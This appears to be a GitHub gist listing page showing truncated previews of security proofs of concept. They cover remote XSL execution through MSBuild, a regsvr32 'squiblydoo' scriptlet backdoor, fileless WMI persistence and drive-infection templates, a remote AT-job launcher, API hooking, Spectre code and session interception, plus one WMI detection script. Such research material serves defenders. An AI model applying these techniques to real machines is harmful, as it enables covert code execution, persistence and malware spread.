ohio813
ohio813
/ dictionary-sorted.txt
Created
March 9, 2018 17:41
— forked from klauspost/dictionary-sorted.txt
Brotli dictionary - printed escaped
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| " </div>" | |
| " })();\r\n" | |
| " && " | |
| " & " | |
| " " | |
| " ''The " | |
| " ("" | |
| " (199" | |
| " (200" | |
| " (e.g." |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="4.0"> | |
| <Target Name="Example"> | |
| <ItemGroup> | |
| <XmlFiles Include="https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/6ce40c15487d67df6771ff205de5ea8a8c6f29c0/customers.xml" /> | |
| </ItemGroup> | |
| <PropertyGroup> | |
| <XslFile>https://gist.githubusercontent.com/caseysmithrc/d6ef2fdffa6c054c6996b0f2fb7dd45d/raw/48abcd2a9575e1e5db25596cbaa02f6066bbe9e2/script.xsl</XslFile> | |
| </PropertyGroup> | |
| <XslTransformation | |
| OutputPaths="output.%(XmlFiles.FileName).html" |
ohio813
/ InterceptorThing.ps1
Created
January 31, 2018 13:17
Interceptor - Normal User No Admin Required.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| .SYNOPSIS | |
| This script demonstrates the ability to capture and tamper with Web sessions. | |
| For secure sessions, this is done by dynamically writing certificates to match the requested domain. | |
| This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack. | |
| Function: Interceptor | |
| Author: Casey Smith, Twitter: @subTee | |
| License: BSD 3-Clause |
ohio813
/ spectre.c
Created
January 25, 2018 15:56
— forked from ErikAugust/spectre.c
Spectre example code
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <stdlib.h> | |
| #include <stdint.h> | |
| #ifdef _MSC_VER | |
| #include <intrin.h> /* for rdtscp and clflush */ | |
| #pragma optimize("gt",on) | |
| #else | |
| #include <x86intrin.h> /* for rdtscp and clflush */ | |
| #endif |
ohio813
/ Injectable.cpp
Created
December 21, 2017 15:00
— forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| FARPROC fpCreateProcessW; | |
| BYTE bSavedByte; | |
| // Blog Post Here: | |
| // https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108 | |
| // tasklist | findstr explore.exe |
ohio813
/ Backdoor-Minimalist.sct
Created
April 27, 2016 05:41
Execute Remote Scripts Via regsvr32.exe - Referred to As "squiblydoo" Please use this reference...
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="Empire" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
| var r = new ActiveXObject("WScript.Shell").Run("cmd.exe"); |
ohio813
/ Example_WMI_Detection_EventLogAlert.ps1
Created
April 4, 2016 09:47
— forked from mattifestation/Example_WMI_Detection_EventLogAlert.ps1
An example of how to use permanent WMI event subscriptions to log a malicious action to the event log
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Define the signature - i.e. __EventFilter | |
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'LateralMovementEvent' | |
| Query = 'SELECT * FROM MSFT_WmiProvider_ExecMethodAsyncEvent_Pre WHERE ObjectPath="Win32_Process" AND MethodName="Create"' | |
| QueryLanguage = 'WQL' | |
| } | |
| $InstanceArgs = @{ | |
| Namespace = 'root/subscription' |
ohio813
/ remote_at_job.ps1
Created
April 4, 2016 09:47
— forked from mattifestation/remote_at_job.ps1
Enable and launch an AT job
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # This code could be used to remotely enable and launch AT jobs regardless of the fact that AT is deprecated in Win8+. | |
| $HKLM = [UInt32] 2147483650 | |
| # Check to see if EnableAt is set | |
| $Result = Invoke-CimMethod -Namespace root/default -ClassName StdRegProv -MethodName GetDWORDValue -Arguments @{ | |
| hDefKey = $HKLM | |
| sSubKeyName = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration' | |
| sValueName = 'EnableAt' | |
| } |
ohio813
/ WMI_persistence_template.ps1
Created
April 4, 2016 09:46
Fileless WMI persistence payload template (CommandlineEventConsumer, __IntervalTimerInstruction trigger, w/ registry payload storage)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Step #1 - Prep payload | |
| $Hive = 'HKLM' | |
| $PayloadKey = 'SOFTWARE\PayloadKey' | |
| $PayloadValue = 'PayloadValue' | |
| $TimerName = 'PayloadTrigger' | |
| $EventFilterName = 'TimerTrigger' | |
| $EventConsumerName = 'ExecuteEvilPowerShell' | |
| switch ($Hive) { | |
| 'HKLM' { $HiveVal = [UInt32] 2147483650 } |
ohio813
/ sample_drive_infector.ps1
Created
April 4, 2016 09:46
— forked from mattifestation/sample_drive_infector.ps1
A PoC drive infector using permanent WMI event subscriptions. I wrote this to demonstrate passing __EventFilter arguments to a CommandLineEventConsumer
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $EventFilterArgs = @{ | |
| EventNamespace = 'root/cimv2' | |
| Name = 'DriveChanged' | |
| Query = 'SELECT * FROM Win32_VolumeChangeEvent' | |
| QueryLanguage = 'WQL' | |
| } | |
| $Filter = Set-WmiInstance -Namespace root/subscription -Class __EventFilter -Arguments $EventFilterArgs | |
| $CommandLineConsumerArgs = @{ |